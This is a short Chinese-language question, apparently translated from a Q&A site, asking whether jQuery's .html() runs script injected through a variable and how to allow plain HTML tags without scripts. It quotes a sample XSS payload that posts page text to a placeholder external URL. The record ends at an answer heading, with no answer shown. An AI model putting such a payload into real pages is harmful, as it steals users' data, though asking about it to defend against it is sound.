jQuery.html()是危险的吗?
$("#id").html("<span>"+ variable + "</span>");
与上面的示例类似,如果变量具有以下值:
"<script> $.post("external_url.php", {sesitivedata= $("#someElement").text()}, function() {} ) </script>"
脚本会被执行吗?如果有,是否有任何方法允许变量包含普通的html标签但不包含脚本?
编辑:在字符串
中添加了脚本标记答案 0 :(得分:3)